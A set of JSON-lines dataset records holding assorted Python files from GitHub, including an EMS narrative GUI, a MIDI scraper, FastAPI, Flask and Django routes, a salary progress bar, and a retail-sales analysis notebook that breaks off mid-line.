sg.InputText(key='hpi')],\n [sg.Text('Transfer method: ', size=(15,1)), sg.Push(), sg.InputText(key='tmethod1')],\n [sg.Text('Taken to: ', size=(15, 1)), sg.Push(), sg.InputText(key='where')],\n [sg.Text('Transfer method: ', size=(15, 1)), sg.Push(), sg.InputText(key='tmethod2')],\n [sg.Text('Name and Cert #: ', size=(15, 1)), sg.Push(), sg.InputText(key='name')],\n [sg.Multiline('', size=(75, 30), key='OUTPUT')],\n [sg.Button('Generate Narrative', key=\"TransportT\")]\n]\n\n# 911 window layout\nlayout911 = [\n [sg.Text('Age: ', size=(15,1)), sg.Push(), sg.InputText(key='age911')],\n [sg.Text('Sex: ', size=(15,1)), sg.Push(), sg.InputText(key='sex911')],\n [sg.Text('L.O.C.: ', size=(15,1)), sg.Push(), sg.InputText(key='loc911')],\n [sg.Text('Found Position: ', size=(15,1)), sg.Push(), sg.InputText(key='pos911')],\n [sg.Text('Immediate life threats: ', size=(25,1)), sg.Push(), sg.InputText(key='life911')],\n [sg.Text('HPI: ', size=(15, 1)), sg.Push(), sg.InputText(key='hpi911')],\n [sg.Text('Downgrade? 
', size=(15, 1)), sg.Push(), sg.InputText(key='downgrade911')],\n [sg.Text('STAIR CHAIR [1], REEVES [2], SCOOP [3], NONE [4]: ', size=(50, 1)), sg.Push(), sg.InputText(key='srs911')],\n [sg.Text('Transfer: [1] To stretcher, [2] To ambulance, [3] Sheet lift, [4] Stand and pivot: ', size=(65, 1)), sg.Push(), sg.InputText(key='tmethod911')],\n [sg.Text('Room: ', size=(15,1)), sg.Push(), sg.InputText(key='room911')],\n [sg.Text('TRANSFER TO BED: [1] Sheet Lift, [2] Assisted, [3] Ambulated: ', size=(55, 1)), sg.Push(), sg.InputText(key='tmethod2911')],\n [sg.Text('Name and Cert #: ', size=(15, 1)), sg.Push(), sg.InputText(key='name911')],\n [sg.Multiline('', size=(75, 30), key='OUTPUT911')],\n [sg.Button(\"Generate 911 Narrative\", key=\"911GEN\")]\n]\n\n# Triage window layout\nlayoutTriage = [\n [sg.Text('Age: ', size=(15,1)), sg.Push(), sg.InputText(key='ageT')],\n [sg.Text('Sex: ', size=(15,1)), sg.Push(), sg.InputText(key='sexT')],\n [sg.Text('L.O.C.: ', size=(15,1)), sg.Push(), sg.InputText(key='locT')],\n [sg.Text('Found Position: ', size=(15,1)), sg.Push(), sg.InputText(key='posT')],\n [sg.Text('Immediate life threats: ', size=(25,1)), sg.Push(), sg.InputText(key='lifeT')],\n [sg.Text('HPI: ', size=(15, 1)), sg.Push(), sg.InputText(key='hpiT')],\n [sg.Text('Downgrade? ', size=(15, 1)), sg.Push(), sg.InputText(key='downgradeT')],\n [sg.Text('STAIR CHAIR [1], REEVES [2], SCOOP [3], NONE [4]: ', size=(50, 1)), sg.Push(), sg.InputText(key='srsT')],\n [sg.Text('Transfer: [1] To stretcher, [2] To ambulance, [3] Sheet lift, [4] Stand and pivot: ', size=(65, 1)), sg.Push(),\n sg.InputText(key='tmethodT')],\n [sg.Text('Name and Cert #: ', size=(15, 1)), sg.Push(), sg.InputText(key='nameT')],\n [sg.Multiline('', size=(75, 30), key='OUTPUTT')],\n [sg.Button(\"Generate Triage Narrative\", key=\"Tr\")]\n]\n\n# Refusal window layout\nlayoutRefusal = [\n [sg.Text('Age: ', size=(15,1)), sg.Push(), sg.InputText(key='ageR')],\n [sg.Text('Sex: ', size=(15,1)), sg.Push(), sg.InputText(key='sexR')],\n [sg.Text('L.O.C.: ', size=(15,1)), sg.Push(), sg.InputText(key='locR')],\n [sg.Text('Found Position: ', size=(15,1)), sg.Push(), sg.InputText(key='posR')],\n [sg.Text('Immediate life threats: ', size=(29,1)), sg.Push(), sg.InputText(key='lifeR')],\n [sg.Text('HPI: ', size=(15, 1)), sg.Push(), sg.InputText(key='hpiR')],\n [sg.Text('Name and Cert #: ', size=(15, 1)), sg.Push(), sg.InputText(key='nameR')],\n [sg.Multiline('', size=(75, 30), key='OUTPUTR')],\n [sg.Button(\"Generate Refusal Narrative\", key=\"R\")]\n]\n\n# Layout settings\nlayoutN = [\n [sg.Column(layout1, key='-COL0-'), sg.Column(layoutTransport, visible=False, key='-COL1-'),\n sg.Column(layoutRefusal, visible=False, key='-COL2-'), sg.Column(layoutTriage, visible=False, key='-COL3-'),\n sg.Column(layout911, visible=False, key='-COL4-')],\n [sg.Exit(), sg.Push(), sg.Button('Back', key=\"back\")]\n]\n\nwindow = sg.Window('Easy Chart', layoutN, finalize=True)\nwindow.bind('', '-NEXT-')\nwindow.bind('', '-PREV-')\nlayoutN = 0\npreviousLayout = 0\n\n# Main UI loop\nwhile True:\n event, values = window.read()\n newClass = Narrative()\n if event == '-NEXT-':\n next_element = window.find_element_with_focus().get_next_focus()\n next_element.set_focus()\n if event == '-PREV-':\n prev_element = window.find_element_with_focus().get_previous_focus()\n prev_element.set_focus()\n if event in (None, 'Exit'):\n break\n if event == 'Transport':\n print(values['unit'])\n window[f'-COL{layoutN}-'].update(visible=False)\n layoutN = 1\n 
window[f'-COL{layoutN}-'].update(visible=True)\n event, values = window.read()\n if event == 'TransportT':\n narrative = newClass.narrativet(values[\"unit\"], values[\"dispatcher\"], values[\"origin\"],\n values[\"destination\"],\n values[\"age\"], values[\"sex\"], values[\"pos\"], values[\"hpi\"],\n values[\"tmethod1\"], values[\"where\"], values[\"tmethod2\"], values[\"name\"])\n window['OUTPUT'].update(value=narrative)\n if event == \"Refusal\":\n window[f'-COL{layoutN}-'].update(visible=False)\n layoutN = 2\n window[f'-COL{layoutN}-'].update(visible=True)\n if event == \"R\":\n narrativeR = newClass.refusal(values[\"ageR\"], values[\"sexR\"], values[\"locR\"], values[\"posR\"],\n values[\"lifeR\"], values[\"hpiR\"], values[\"nameR\"])\n window['OUTPUTR'].update(value=narrativeR)\n if event == '911 Triage':\n window[f'-COL{layoutN}-'].update(visible=False)\n layoutN = 3\n window[f'-COL{layoutN}-'].update(visible=True)\n if event == 'Tr':\n narrativeT = newClass.triage(values[\"ageT\"], values[\"sexT\"], values[\"locT\"], values[\"posT\"],\n values[\"lifeT\"], values[\"hpiT\"], values[\"downgradeT\"], values[\"srsT\"],\n values[\"tmethodT\"],values[\"nameT\"])\n window['OUTPUTT'].update(value=narrativeT)\n if event == \"911\":\n window[f'-COL{layoutN}-'].update(visible=False)\n layoutN = 4\n window[f'-COL{layoutN}-'].update(visible=True)\n if event == '911GEN':\n narrative911 = newClass.c911(values[\"age911\"], values[\"sex911\"], values[\"loc911\"], values[\"pos911\"],\n values[\"life911\"], values[\"hpi911\"], values[\"downgrade911\"], values[\"srs911\"],\n values[\"tmethod911\"], values[\"tmethod2911\"], values[\"room911\"],\n values[\"name911\"])\n window['OUTPUT911'].update(value=narrative911)\n if event == 'back':\n window[f'-COL{layoutN}-'].update(visible=False)\n layoutN = 0\n window[f'-COL{layoutN}-'].update(visible=True)\nwindow.close()","repo_name":"SanB-1/EMS-EasyChart","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73390891528","text":"from os import error\r\nimport sqlite3\r\n\r\n# get all the products from the file products.txt for setup of db\r\ndef get_products():\r\n products = list()\r\n try:\r\n with open('products.txt') as f:\r\n for index, line in enumerate(f.readlines()):\r\n product = line.split('=')\r\n product[1] = int(product[1])\r\n product.insert(0, index+1)\r\n products.append(tuple(product))\r\n except Exception as err:\r\n raise err\r\n return products\r\n\r\n#variable declaration\r\nconnection = None\r\ncursor = None\r\n\r\n\r\n# connect to database and create products as mentioned in the products.txt file\r\ntry:\r\n connection = sqlite3.connect('codem\\ecommerceapi\\db.sqlite3')\r\n cursor = connection.cursor()\r\n cursor.execute('DELETE FROM simpleapi_product ')\r\n connection.commit()\r\n for product in get_products():\r\n cursor.execute(\"insert into simpleapi_product values (?, ?, ?)\", product)\r\n connection.commit()\r\nexcept Exception as e:\r\n print(e)\r\nfinally:\r\n cursor.close()\r\n connection.close()","repo_name":"harikrishna-gujje/ecommerce_api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"2471061002","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nfrom joblib import Parallel, delayed\nfrom tqdm import 
tqdm\nos.makedirs(\"data/ichigos\", exist_ok=True)\n\nsuffix = [\n 'others',\n 'fi',\n *[item for item in 'abcdefghijklmnopqrstuvwxyz']\n]\n\npage_url = 'https://ichigos.com/sheets/'\nrequired_names = [\n ' for piano',\n '\"for piano\"',\n \"'for piano'\",\n \"'piano solo'\",\n \"('for piano')\",\n '(for piano)',\n 'a piano arrangement, for the advanced pianist',\n 'arranged for piano solo',\n 'for easier piano',\n 'for easy piano',\n 'for easy piano or mallets',\n 'for jazz piano',\n 'for piano',\n 'for piano ',\n 'for piano & flute',\n 'for piano (duet not included)',\n 'for piano (full rock version)',\n 'for piano (intermediate)',\n 'for piano (trust me! it sounds better on piano -dedicated to prissyrox4vr)',\n 'for piano (tv size)',\n 'for piano - [simplified]',\n 'for piano - midi made from a pdf from the net...',\n 'for piano 1',\n 'for piano [exercise 7th chords]',\n 'for piano [exercise chords]',\n 'for piano in c# major and easy c major',\n 'for piano only',\n 'for piano or harp',\n 'for piano or synthesizer ',\n 'for piano solo',\n 'for piano solo or lead sheet',\n 'for piano(based on bgm in ep8)',\n 'for piano, credits to kerengi on fiverr',\n \"for piano, from piano stories best '88-'08\",\n 'for piano, transcribed for sonickku',\n 'for piano, vibraphone',\n 'for piano, w/ optional ostinato',\n 'for piano; original key',\n 'for recoder/ piano easy',\n 'for simple piano',\n 'for solo piano',\n 'from final fantasy xv original soundtrack: piano arrangements',\n 'jazz piano',\n 'piano',\n 'piano ',\n 'piano (easier c major)',\n 'piano (original ab major)',\n 'piano (resubmit)',\n 'piano - advanced',\n 'piano arrangement',\n 'piano collection / medley',\n 'piano collections: moonlit melodies',\n 'piano cover',\n 'piano cover by eriol',\n 'piano medley',\n 'piano melody',\n 'piano sequence of song',\n 'piano sheet',\n 'piano solo',\n 'piano solo (revised)',\n 'piano solo with variations',\n 'piano version',\n 'piano, arranged',\n 'sheet music for piano',\n 'simple piano',\n 'simplifed piano',\n 'solo piano',\n 'strictly for piano',\n]\n\nmidi_request_prefix = \"https://ichigos.com\"\ndef parse_pages():\n print(\"Parsing URLs\")\n links = []\n for s in tqdm(suffix):\n soup = BeautifulSoup(requests.get(f\"{page_url}/{s}\").content, \"html.parser\")\n possible_tags = soup.find_all(href=re.compile(r\"type\\=midi\"))\n \n for item in possible_tags:\n n = item.find_previous_sibling(\"i\").text.lower()\n if n in required_names:\n links.append(f\"{midi_request_prefix}/{item.attrs['href']}\")\n return links\n\ndef download(link, i):\n path = os.path.join(\"data/ichigos\", f\"{i}_ichigo.mid\")\n\n with open(path, \"wb\") as f:\n f.write(requests.get(link).content)\n\nlinks = parse_pages()\nprint(\"Downloading MIDIs\")\nParallel(n_jobs=-1, prefer=\"processes\")(delayed(download)(l, i) for i, l in tqdm(enumerate(links), total=len(links)))\n\n","repo_name":"ojus1/MyMusicTransformer","sub_path":"scrape/ichigos.py","file_name":"ichigos.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"12115663255","text":"#0528 DP \n#왜 다이나믹 프로그래밍인가?\n#-> 그 전에 거쳐온 경로의 값을 기억하고, 뒤의 더 큰 문제에 이용한다.\n#-> 또한 우리는 마지막에 몇 번의 경우의 수를 통해 도착했는지를 알아내야 하기 때문에\n#-> dfs/bfs로 모든 탐색 경로를 지정하는 것이 아닌, dp를 통해 지나온 흐름을 기록하기만 하면 된다.\n\nn=int(input())\narray=[]\nfor y in range(n):\n array.append(list(map(int,input().split(\" \"))))\n\n#방향벡터\ndy=[0,1]\ndx=[1,0]\n#거쳐온 array의 위치를 기록하는 자료구조\nd=[[0] *n for _ in 
range(n)]\nd[0][0]=1\n\n#array배열에서 d를 갱신하는 함수\ndef find():\n for y in range(n):\n for x in range(n):\n if y==n-1 and x==n-1: #맨 오른쪽 아래에 도착\n return d[y][x]\n weight=array[y][x]\n for i in range(2):\n ny=y+dy[i]*weight\n nx=x+dx[i]*weight\n #범위가 벗어나지 않으면 거쳐갈 수 있음.\n if ny>=n or nx>=n: continue\n d[ny][nx]+=d[y][x]\n\nprint(find())","repo_name":"kwonET/2023CodingStudy","sub_path":"BomiKwon/dp/BOJ_1890_점프.py","file_name":"BOJ_1890_점프.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1983288676","text":"from fastapi import APIRouter, HTTPException, Request, Depends\nfrom ...crud.db import get_crud_db\nfrom ...tasks.models import TaskCreate, Task, TaskRead\nfrom ...task_item.models import TaskItem, TaskItemCreate, TaskItemRead, TaskItemUpdate\nfrom ...users.models import User\nfrom ...users.manager import current_active_user\n\nrouter = APIRouter()\n\n\n@router.post(\"/tasks_item\")\nasync def create_task_item(\n request: Request, task_create: TaskItemCreate, db=Depends(get_crud_db), user: User = Depends(current_active_user)\n):\n task_model_obj = TaskItem(**task_create.dict())\n task = await db.create(task_model_obj)\n return task\n\n\n@router.get(\"/task_item\")\nasync def get_task_items(\n request: Request, task_id: int, db=Depends(get_crud_db)\n):\n tasks = await db.get_items_for_task(Task, task_id)\n return tasks\n\n@router.put(\"/tasks_item/{task_item_id}\")\nasync def update_task_item(\n task_item_id: int, task_update: TaskItemUpdate, db=Depends(get_crud_db), user: User = Depends(current_active_user)\n):\n await db.update_task_item(task_update, task_item_id)\n\n\n@router.delete(\"/tasks_item\")\nasync def delete_task_item(\n item_id: int, db=Depends(get_crud_db), user: User = Depends(current_active_user)\n):\n deleted_task = await db.delete_item(item_id)\n if deleted_task:\n return {\"message\": \"Task deleted successfully\"}\n else:\n raise HTTPException(status_code=404, detail=\"Task not found\")","repo_name":"ArberBajraktari/adhd-api","sub_path":"src/api/endpoints/tasksItem.py","file_name":"tasksItem.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18903020244","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . 
import views\n\napp_name = \"cart\"\nurlpatterns = [\n path('cart', views.cart_view, name='cart-view'),\n path('clear-cart/', views.clear_cart, name='clear-cart'),\n path('delete//', views.delete_item, name='delete-item'),\n path('check-out', views.cart_check_out, name='cart-check-out'),\n path('update-item/', views.update_cart_Item, name='update-cart-Item'),\n path('order-porcess/', views.order_process, name='order-process'),\n path('pdf-invoice/', views.render_pdf_invoice, name='render-pdf-invoice'),\n\n]\n","repo_name":"ahmedel-tawil/shopping-cart-django","sub_path":"cart/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12901172944","text":"import os,sys\nimport time\nfrom datetime import datetime\n\n# dian@duck.com\n\nclass ColorStr:\n\n green_start = \"\\N{ESC}[32m\"\n gray_start = \"\\N{ESC}[90m\"\n color_end = \"\\u001b[0m\"\n\n @classmethod\n def green(cls, s:str) -> str:\n return cls.green_start + s + cls.color_end\n\n @classmethod\n def gray(cls, s:str) -> str:\n return cls.gray_start + s + cls.color_end\n\n\nclass Money:\n def __init__(self,\n work_days:float = 20,\n month:float = 100,\n daily:float = 3,\n year:float = 1200,\n start:float = 9,\n end:float = 18):\n\n if daily:\n self.day = daily\n elif month:\n self.day = month / work_days\n elif year:\n self.day = year / (12 * work_days)\n else:\n raise ValueError(\"The salary is needed!\")\n\n self.start_hour = int(start)\n self.start_min = int(60 * (start - self.start_hour))\n\n self.end_hour = int(end)\n self.end_min = int(60 * (end - self.end_hour))\n\n self._time_out = 600\n\n self.update_start_end()\n\n def update_start_end(self):\n now = datetime.now()\n self.last_update = now.timestamp()\n\n _s = now.replace(hour=self.start_hour, minute=self.start_min, second=0, microsecond=0)\n self.start = _s.timestamp()\n\n _e = now.replace(hour=self.end_hour, minute=self.end_min, second=0, microsecond=0)\n self.end = _e.timestamp()\n\n self.len = self.end - self.start\n\n def now(self):\n now = datetime.now().timestamp()\n \n if (now - self.last_update) > self._time_out:\n self.update_start_end()\n\n if now < self.start:\n return 0,0\n if now > self.end:\n return 1, self.day\n\n finish = (now - self.start) / self.len\n salary = finish * self.day\n return finish, salary\n\nclass Bar:\n sc = chr(27) + \"[2J\"\n label = \"■\"\n def __init__(self, salary: Money):\n os.system(\"clear\")\n self.m = salary\n\n def format_str(self) -> str:\n total = os.get_terminal_size().columns - 15\n empty = ['' for i in range(total)]\n finish, money = self.m.now()\n count = int(finish * total)\n f_str = self.label.join(empty[:count])\n e_str = self.label.join(empty[count:])\n show_str = \"\\n\" + ColorStr.green(f_str) + ColorStr.gray(e_str) \n show_str = show_str + \" %.2f%% %.0f¥\"%(finish * 100, money) + \"\\n\"\n return show_str\n\n def run(self):\n while True:\n s = self.format_str()\n # sys.stdout.write(\"\\033c\")\n # sys.stdout.flush()\n print(\"\\033c\", end = \"\")\n sys.stdout.write(self.format_str())\n sys.stdout.flush()\n time.sleep(1)\n\ndef main():\n m = Money(daily = 100, start = 9, end = 18)\n bar = Bar(m)\n bar.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"diandianti/money-bar","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
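Each record in this dump is one JSON object whose "text" field holds an embedded source file and whose remaining fields ("seq_id", "repo_name", "sub_path", "file_name", "file_ext", "file_size_in_byte", "program_lang", "lang", "doc_type", "stars", "dataset", "pt") describe where it came from. As a minimal sketch of how records in this shape can be read back from a newline-delimited JSON file for inspection, the snippet below parses one object per line; the file name "records.jsonl" and the helper name "iter_records" are illustrative assumptions, not part of the dataset itself.

import json

def iter_records(path):
    # Hypothetical helper: yields one parsed record per line of a JSONL dump
    # shaped like the objects above; diff-style '+' prefixes are tolerated.
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            line = line.strip().lstrip("+")
            if not line.startswith("{"):
                continue  # skip anything that is not a JSON object
            try:
                yield json.loads(line)
            except json.JSONDecodeError:
                continue  # skip truncated or malformed lines

for record in iter_records("records.jsonl"):
    # "repo_name" and "sub_path" identify the original file; "text" holds its source.
    print(record["repo_name"], record["sub_path"], len(record["text"]))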
+{"seq_id":"74395354247","text":"from typing import List\n\nfrom tkinter import ttk\nimport customtkinter as ctk\n\nfrom controller.token import Token\n\n# # Modes: \"System\" (standard), \"Dark\", \"Light\"\n\n\nclass TokenTable(ctk.CTkToplevel):\n def __init__(self, parent, tokens: List[Token]):\n super().__init__(parent)\n\n self.title(\"Tabla de tokens\")\n self.geometry(\"800x600\")\n self.resizable(False, False)\n\n self.tokens = tokens\n\n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(0, weight=1)\n\n self.create_table()\n\n def create_table(self):\n self.treeview = ttk.Treeview(self)\n\n self.treeview['columns'] = (\n 'Correlativo',\n 'Tipo',\n 'Lexema'\n )\n\n self.treeview.column(\"#0\", width=0, stretch=\"NO\")\n self.treeview.column(\"Correlativo\", anchor=\"w\")\n self.treeview.column(\"Tipo\", anchor=\"w\")\n self.treeview.column(\"Lexema\", anchor=\"w\")\n\n self.treeview.heading(\"#0\", text=\"\", anchor=\"center\")\n self.treeview.heading(\n \"Correlativo\", text=\"Correlativo\", anchor=\"w\")\n self.treeview.heading(\"Tipo\", text=\"Tipo\", anchor=\"w\")\n self.treeview.heading(\"Lexema\", text=\"Lexema\", anchor=\"w\")\n self.show_tokens()\n\n self.treeview.grid(row=0, column=0, sticky=\"nsew\", padx=10, pady=10)\n\n def show_tokens(self):\n for index in range(len(self.tokens)):\n self.treeview.insert(\n \"\", \"end\", text=\"\", values=(str(index), self.tokens[index].token_type.name, self.tokens[index].literal))\n","repo_name":"danielcuque/LFP_Proyecto2_202112145","sub_path":"view/token_table.py","file_name":"token_table.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30703305115","text":"import traceback\nfrom flask import Blueprint, abort, request, current_app\nfrom model.empleado import get_empleado\nfrom utils.config import http_error_dict\nfrom utils.environment import get_environment\nfrom bson import json_util\nimport json\n\nfrom model.usuario import get_usuario, delete_usuario, create_usuario, update_usuario\n\nserverConfig = get_environment(\"Server\")\napi_usuario = Blueprint(\"api_usuario\", __name__)\n\n@api_usuario.route(\"/usuario/actualizar/\", methods=[\"PUT\"])\ndef update_api_usuario():\n try:\n usuario = request.get_json()\n\n contraseña = usuario[\"contraseña\"]\n correo = usuario[\"correo\"]\n\n mongo_data = update_db_usuario(contraseña, correo)\n\n return mongo_data, 200\n\n except Exception as e:\n traceback.print_exc()\n abort(http_error_dict[type(e).__name__])\n\n@api_usuario.route(\"/usuario/crear/\", methods=[\"POST\"])\ndef create_api_usuario():\n try:\n usuario = request.get_json()\n\n id_empleado = usuario[\"id_empleado\"]\n nombre_usuario = usuario[\"nombre_usuario\"]\n contraseña = usuario[\"contraseña\"]\n correo = usuario[\"correo\"]\n\n mongo_data = create_db_usuario(id_empleado, nombre_usuario, contraseña, correo)\n\n return mongo_data, 200\n except Exception as e:\n abort(http_error_dict[type(e).__name__])\n\n@api_usuario.route(\"/usuario/ver/\", methods=[\"GET\"])\ndef get_usuario_by_correo(correo):\n try:\n if correo:\n mongo_data = get_db_usuario(correo)\n\n return mongo_data, 200\n else:\n abort(400)\n except Exception as e:\n abort(http_error_dict[type.__name__])\n\n@api_usuario.route(\"/usuario/eliminar/\", methods=[\"DELETE\"])\ndef delete_api_usuario_by_id(id):\n try:\n if id:\n mongo_data = delete_db_usuario(id)\n\n return mongo_data, 200\n else:\n abort(400)\n\n except Exception as e:\n 
abort(http_error_dict[type(e).__name__])\n\ndef get_db_usuario(id):\n data = None\n mensaje = \"\"\n status = \"Success\"\n response = {}\n try:\n resultado = get_usuario(id)\n if resultado:\n data = json.loads(json.dumps(resultado, default=json_util.default))\n else:\n data = None\n\n status = \"Success\"\n except Exception as e:\n status = \"Error\"\n mensaje = str(e)\n\n response[\"data\"] = data\n response[\"status\"] = status\n response[\"mensaje\"] = mensaje\n\n return response\n\ndef delete_db_usuario(id):\n data = None\n mensaje = \"\"\n status = \"Success\"\n response = {}\n try:\n resultado = delete_usuario(id)\n\n if resultado:\n data = json.loads(json.dumps(resultado, default=json_util.default))\n else:\n data = None\n\n status = \"Success\"\n except Exception as e:\n status = \"Error\"\n mensaje = str(e)\n\n response[\"data\"] = data\n response[\"status\"] = status\n response[\"mensaje\"] = mensaje\n\n return response\n\ndef create_db_usuario(id_empleado, nombre_usuario, contraseña, correo):\n data = None\n mensaje = \"\"\n status = \"Success\"\n response = {}\n try:\n resultado = create_usuario(id_empleado, nombre_usuario, contraseña, correo)\n\n if resultado:\n data = json.loads(json.dumps(get_empleado(id_empleado), default=json_util.default))\n else:\n data = None\n\n status = \"Success\"\n except Exception as e:\n logger = current_app.logger\n status = \"Error\"\n mensaje = str(e)\n logger.info(traceback.print_exc())\n\n response[\"data\"] = data\n response[\"status\"] = status\n response[\"mensaje\"] = mensaje\n\n return response\n\ndef update_db_usuario(contraseña, correo):\n logger = current_app.logger\n data = None\n mensaje = \"\"\n status = \"Success\"\n response = {}\n try:\n resultado = update_usuario(contraseña, correo)\n logger.info(resultado)\n\n if resultado:\n data = json.loads(json.dumps(get_usuario(correo), default=json_util.default))\n else:\n data = None\n\n status = \"Success\"\n except Exception as e:\n status = \"Error\"\n mensaje = str(e)\n\n response[\"data\"] = data\n response[\"status\"] = status\n response[\"mensaje\"] = mensaje\n\n return response","repo_name":"noemylh/api-planilla-db","sub_path":"Proyecyo-desarrolo-web/controller/apiUsuario.py","file_name":"apiUsuario.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21545455568","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\nfrom sklearn.linear_model import LinearRegression\n\nimport os\nimport calendar\nimport networkx as nx\nfrom pandas.plotting import scatter_matrix, parallel_coordinates\nimport seaborn as sns\nfrom sklearn import preprocessing\nimport matplotlib.pylab as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing\nimport matplotlib.pylab as plt\n\nimport math\nfrom sklearn.metrics import accuracy_score, roc_curve, auc\nfrom dmba import regressionSummary, classificationSummary, liftChart, gainsChart\nfrom sklearn.linear_model import LinearRegression, Lasso, Ridge, LassoCV, BayesianRidge\nimport statsmodels.formula.api as sm\n\nfrom dmba import regressionSummary, exhaustive_search\nfrom dmba import backward_elimination, forward_selection, stepwise_selection\nfrom dmba import adjusted_r2_score, AIC_score, BIC_score\n\nfrom 
sklearn.metrics import accuracy_score\nfrom sklearn.neighbors import NearestNeighbors, KNeighborsClassifier\n\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import train_test_split, cross_val_score, GridSearchCV\nfrom dmba import plotDecisionTree, classificationSummary, regressionSummary\n\nimport statsmodels.api as sm\nfrom mord import LogisticIT\nimport matplotlib.pylab as plt\nimport seaborn as sns\nfrom dmba import classificationSummary, gainsChart, liftChart\nfrom dmba.metric import AIC_score\n\nimport statsmodels.formula.api as sm\n\nfrom dmba import regressionSummary, exhaustive_search\nfrom dmba import backward_elimination, forward_selection, stepwise_selection\nfrom dmba import adjusted_r2_score, AIC_score, BIC_score\n\n\n# In[2]:\n\n\nretail = pd.read_csv('retailsales.csv')\n\n\n# In[3]:\n\n\nretail.head(20)\n\n\n# In[4]:\n\n\n# random_state is set to a defined value to get the same partitions when re-running the code\ntrainData= retail.sample(frac=0.6, random_state=1)\n# assign rows that are not already in the training set, into validation \nvalidData = retail.drop(trainData.index)\n\nprint('Training : ', trainData.shape)\nprint('Validation : ', validData.shape)\nprint()\n\n\n# In[5]:\n\n\n# alternative way using scikit-learn\ntrainData, validData = train_test_split(retail, test_size=0.40, random_state=1)\nprint('Training : ', trainData.shape)\nprint('Validation : ', validData.shape)\n\n\n# In[6]:\n\n\nretail_ts = pd.Series(retail.retailsales.values, index=retail.month)\n\n\n# In[8]:\n\n\nplt.plot(retail_ts)\n\n\n# In[9]:\n\n\nplt.plot(retail_ts.index, retail_ts)\nplt.xlabel('time') # set x-axis label\nplt.ylabel('Retailsales (in mil)') # set y-axis label\n\n\n# In[15]:\n\n\n#2)Histogram\n\nax = retail.retailsales.hist()\nax.set_xlabel('retailsales')\nax.set_ylabel('count')\n\nplt.show()\n\n\n# In[11]:\n\n\n#3)Boxplot\n\nax = retail.boxplot(column='retailsales')\nax.set_ylabel('retailsales')\nplt.suptitle('') # Suppress the titles\nplt.title('')\n\t\nplt.show()\n\n\n# In[12]:\n\n\n#4)Subplots\n\nfig, axes = plt.subplots(nrows=1, ncols=4)\nretail.boxplot(column='retailsales', ax=axes[0])\nretail.boxplot (column='percapitaincome', ax=axes[1])\nretail.boxplot (column='population', ax=axes[2])\nretail.boxplot (column='unemployment', ax=axes[3])\nfor ax in axes:\n ax.set_xlabel('subplot')\nplt.suptitle('') # Suppress the overall title\nplt.tight_layout() # Increase the separation between the plots\n\nplt.show()\n\n\n# In[13]:\n\n\n#5) Correlation\n\ncorr = retail.corr()\nsns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns)\n\n\n# Change the colormap to a divergent scale and fix the range of the colormap\nsns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns, vmin=-1, vmax=1, cmap=\"RdBu\")\n\n# Include information about values\nfig, ax = plt.subplots()\nfig.set_size_inches(7, 4)\nsns.heatmap(corr, annot=True, fmt=\".2f\", cmap=\"RdBu\", center=0.7, vmin=-1.0, vmax=1.0, ax=ax)\n\nplt.show()\n\n\n\n# Color the points by the value\nretail.plot.scatter(x='retailsales', y='percapitaincome')\n\n\n# In[14]:\n\n\n#Compute mean, standard dev., min, max, median, length, and missing values for all variables\npd.DataFrame({'mean': retail.mean(),\n 'sd': retail.std(),\n 'min': retail.min(),\n 'max': retail.max(),\n 'median': retail.median(),\n 'length': len(retail),\n 'miss.val': 
retail.isnull().sum(),\n })\n\n\n# In[16]:\n\n\n#Correlation matrix\n\nretail.corr().round(2)\n\n\n# In[17]:\n\n\n\n#PCA analysis\n\nretail = pd.read_csv('retailsales.csv')\npcs = PCA(n_components=2)\npcs.fit(retail[['percapitaincome', 'population']])\n\npcsSummary = pd.DataFrame({'Standard deviation': np.sqrt(pcs.explained_variance_),\n 'Proportion of variance': pcs.explained_variance_ratio_,\n 'Cumulative proportion': np.cumsum(pcs.explained_variance_ratio_)})\npcsSummary = pcsSummary.transpose()\npcsSummary.columns = ['PC1', 'PC2']\npcsSummary.round(4)\n\n\n# In[20]:\n\n\n#The components_ field of pcs gives the individual components. \n#The columns in this matrix are the principal components PC1, PC2.\n#The rows are variables in the order they are found in the input matrix, calories and rating. Below is code for weight#\n\n\npcsComponents_df = pd.DataFrame(pcs.components_.transpose(), columns=['PC1', 'PC2'], \n index=['percapitaincome', 